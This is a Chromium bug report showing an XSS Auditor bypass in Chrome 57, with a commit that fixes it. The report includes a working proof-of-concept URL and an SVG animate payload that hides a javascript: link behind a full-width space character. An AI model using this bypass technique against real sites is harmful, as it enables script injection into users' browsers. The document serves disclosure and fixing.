XSS Auditor bypass with link + SVG animations

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 Steps to reproduce the problem: 1. Go to `https://vulnerabledoma.in/char_test?body=%3Csvg%3E%3Canimate%20href=%23x%20attributeName=href%20values=%26%23x3000%3Bjavascript:alert(1)%20/%3E%3Ca%20id=x%3E%3Crect%20width=100%20height=100%20/%3E%3C/a%3E` 2. Click the black square. JavaScript is run. The vector is: ``` <svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect width=100 height=100 /></a> ``` What is the expected behavior? It should be blocked by XSS Auditor What went wrong? It is not blocked by XSS Auditor Did this work before? N/A Chrome version: 57.0.2987.133 Channel: stable OS Version: 10.0 Flash Version: The following revision refers to this bug: https://chromium.googlesource.com/chromium/src.git/+/cd2205139c375696291bffcf86d27ef4e83d7994 commit cd2205139c375696291bffcf86d27ef4e83d7994 Author: `fs <fs@opera.com>` Date: Tue Apr 11 17:08:49 2017 Strip only ASCII spaces from SMIL 'values' attributes This is more consistent with other microsyntaxes used for attribute parsing, while also making it consistent with the XSSAuditor. BUG=709365, 710460 Review-Url: https://codereview.chromium.org/2807193003 Cr-Commit-Position: refs/heads/master@{#463662} [add] https://crrev.com/cd2205139c375696291bffcf86d27ef4e83d7994/third_party/WebKit/LayoutTests/svg/animations/animate-values-whitespace.html [modify] https://crrev.com/cd2205139c375696291bffcf86d27ef4e83d7994/third_party/WebKit/Source/core/svg/SVGAnimationElement.cpp